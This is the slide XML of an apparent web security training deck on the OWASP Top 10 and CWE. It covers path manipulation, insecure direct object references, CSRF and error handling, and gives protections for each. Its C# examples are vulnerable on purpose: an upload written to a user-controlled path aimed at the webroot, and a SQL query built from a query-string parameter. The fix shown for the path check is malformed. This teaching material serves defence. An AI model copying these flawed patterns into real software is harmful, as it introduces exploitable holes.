              <a:rPr lang="en-US" sz="2300" dirty="0" err="1" smtClean="0"/>
              <a:t>myFile.ContentLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2300" dirty="0" smtClean="0"/>
              <a:t>];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cs-CZ" dirty="0" smtClean="0"/>
              <a:t>FileStream newFile = new FileStream(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, FileMode.Create);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	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Write data to the file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cs-CZ" dirty="0" smtClean="0"/>
              <a:t>newFile.Write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>.Length);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newFile.Close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>();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what if: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\someFile.aspx”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9144000" cy="141763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C# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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ASP.Net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Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188420" name="Slide Number Placeholder 3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94C91F-C964-4310-B88E-3A2677B30E60}" type="slidenum">
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188421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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10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929222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Do not allow user input to be used for any part of a file or path name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Where user input must influence a file name or URL, use a fully enumerated list to positively validate the value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Reject any input that does not strictly conform to specifications, or transform it into something that does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586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700" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CWE-73: External Control of File Name or Path - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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8541C0-3061-4BB4-B532-9D767DEE623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/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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="714355"/>
            <a:ext cx="9144000" cy="60595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cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HttpPostedFile myFile = fil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MyFile.PostedFile;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cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>byte[] myData = new byte[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>myFile.ContentLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>];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	check for valid path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	if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>.StartsWith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(“C:\Temp” == false)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	{   return;  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cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>FileStream newFile = new FileStream(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, FileMode.Create);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	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Write data to the file 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cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>newFile.Write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>myData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>myData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.Length);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newFile.Close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/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-1" y="0"/>
            <a:ext cx="9013825" cy="92867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C# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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ASP.Net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Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186372" name="Slide Number Placeholder 3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3271AB-7632-4D50-A7CC-90DC53231F26}" type="slidenum">
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186373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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10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1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12287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400" b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP Definition: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A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter.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Attackers can manipulate those references to access other objects without authorization.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A4.	Insecure Direct Object Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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CCA00B-61A2-4744-81E2-05EE67DDDE7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337192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Applications often expose internal objects, making them accessible via parameters.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When those objects are exposed, the attacker may manipulate unauthorized objects, if proper access controls are not used.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Internal Objects might include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="68000"/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ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Files or Directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="68000"/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ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="68000"/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ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Database key, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>acct_no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>group_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="68000"/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ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Other database object names such as a table name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A4.	Insecure Direct Object Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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F25606-CB9B-4157-8D10-FB3FDFB6AF0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en-US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072098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Simple URL that does access indirect objet reference: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Ex: URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.banksite.com/account/view.aspx?id=23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRP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Somewhere in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>view.aspx.cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> code page: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string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sqlQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = “select * from Accounts where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>AccID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = “ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Request.QueryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“id”];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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzTx/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What happens if URL changed to: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.banksite.com/account/view.aspx?id=24</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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9013825" cy="141763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C# ASP.NET Example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710A3E-58A2-4C90-A4D8-55A9E3C9527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What is Web Application Security ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto"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Why is it important ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto"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OWASP Top 10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Description of the vulnerability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Example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Solution ( Best Practice to avoid the vulnerability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="-256032" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="4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Top 25 Programming Errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2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Description of the error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2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Example </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2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Solution ( Best Practice to avoid the error) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="2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Hands - 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2150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A6D274-D1EC-46C0-A23D-E45CD6718A4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1071546"/>
            <a:ext cx="9013825" cy="5337192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="590550" indent="-590550" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Do not expose direct objects via parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="590550" indent="-590550" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Use an indirect mapping which is simple to validate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="590550" indent="-590550" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Consider using a mapped numeric range, file=1 or 2 …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="590550" indent="-590550" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Re-verify authorization at every reference.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="590550" indent="-590550" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1020763" lvl="1" indent="-514350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ct val="68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Application provided an initial lists of only the authorized options.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1020763" lvl="1" indent="-514350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ct val="68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When user’s option is “submitted” as a parameter, authorization must be checked again.</a:t>
            </a:r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A4.	Insecure Direct Object Reference - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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BC19DD-F324-4773-A9F4-71219891564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en-US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265754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400" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP Definition: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A CSRF attack forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim’s browser to perform a hostile action to the benefit of the attacker.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CSRF can be as powerful as the web application that it attacks.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42984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A5.	Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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32F538-F3EB-41DF-AA36-E3EB80C1A16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Applications are vulnerable if any of following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="15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 Does not re-verify authorization of action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="15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 Default login/password will authorize action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="15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 Action will be authorized based only on credentials which are automatically submitted by the browser such as session cookie, Kerberos token, basic authentication, or SSL certificate etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" pitchFamily="18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A5.	Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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C7A201-B143-4329-BB00-CF787C386DA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en-US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667000"/>
            <a:ext cx="1481138" cy="45085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User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Oval 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2792413" y="2133600"/>
            <a:ext cx="1703387" cy="1524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Web Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Oval 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="820738"/>
            <a:ext cx="3200400" cy="3675062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6248400" y="2438400"/>
            <a:ext cx="1703388" cy="1524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Trusted Action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="TextBox 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6161088" y="1441450"/>
            <a:ext cx="191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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Trusted Site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4076700" y="2235200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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authenticated Session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Elbow Connector 19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="6"/>
            <a:endCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="2895600"/>
            <a:ext cx="17526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3"/>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1938338" y="2892425"/>
            <a:ext cx="854075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00200" y="4724400"/>
            <a:ext cx="1703388" cy="1524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/>
              <a:t>Attacking Site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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2417763" y="2971800"/>
            <a:ext cx="515937" cy="1752600"/>
            <a:chOff x="2417391" y="2971800"/>
            <a:chExt cx="516497" cy="1752601"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31" name="Straight Connector 30"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="23" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="1568902" y="3840949"/>
              <a:ext cx="1752601" cy="143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17391" y="2990850"/>
              <a:ext cx="516497" cy="47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15" name="TextBox 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="9013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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A5. CSRF Illustration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47116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3B402D-D487-4E6A-9F62-9573CE56AA7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en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47117" name="Footer Placeholder 1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337192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Eliminate any Cross Site Scripting vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="15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 Not all CSRF attacks require XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="15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 However, XSS is a major channel for delivery of CSRF attacks.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Generate unique random tokens for each form or URL, which are not automatically transmitted by the browser.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Do not allow GET request for sensitive actions.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For sensitive actions, re-authenticate or digitally sign the transaction.</a:t>
            </a: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A5. CSRF - Protection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BC26B9-B707-4B9A-A265-5AA0DF80DA3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194316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Applications are vulnerable if any of following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="20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 Does not re-verify authorization of action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="20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 Default login/password will authorize action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="20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 Action will be authorized based only on credentials which are automatically submitted by the browser such as session cookie, Kerberos token, basic authentication, or SSL certificate etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" pitchFamily="18" charset="2"/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111" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CWE-352: Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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0902E7-DF19-49B0-B6B2-AE35BFC08F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1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006992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Do not use GET method for any request that triggers a state change or performs critical action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2 step authentication for every user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Prevent XSS vulnerability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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CWE-352: Cross-Site Request Forgery (CSRF) - Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t/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9909FB-1BD2-463A-A318-0832C3D50FB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en-US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072098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400" b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP Definition:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493713" lvl="1" indent="12700">
              <a:buFont typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="238125" indent="127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Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="238125" indent="127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Attackers use this weakness to steal sensitive data or conduct more serious attacks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A6.	Information Leakage &amp; Improper Error Handling</a:t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C9261A-0C8D-4957-90E4-13AFEC2AA8C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en-US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A6.	Information Leakage &amp; Improper Error Handling - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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28800"/>
            <a:ext cx="770413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830263" y="1600200"/>
            <a:ext cx="8085137" cy="190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EAFEAB-A601-4DC0-93E6-0A78F1976F8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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51205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94316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lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef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Prevent display of detailed internal error messages including stack traces, messages with database or table names, protocols, and other error codes. (This can provide attackers clues as to potential flaws.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="20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Good error handling systems should always enforce the security scheme in place while still being able to handle any feasible input.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214422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A6. Improper Error Handling - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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35AB45-C06A-4B25-9982-59D103F53C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en-US"/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28670"/>
            <a:ext cx="9144001" cy="5480068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/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600" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Easy to Pluck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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 smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Simple to exploit without any tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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 smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Basic web development knowledge is sufficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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 smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Less chances of being detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="-256032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 smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Consequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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 smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Corruption of database items, revealing database entries </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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 smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Defacing a web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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 smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Your site may be used as source for further attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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 smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Losing authentication of users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" fontAlgn="auto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 smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Access to web directory structure and application server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Why is it Important?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5C7F57-9306-47A4-B324-46A9F05D3C3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94316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
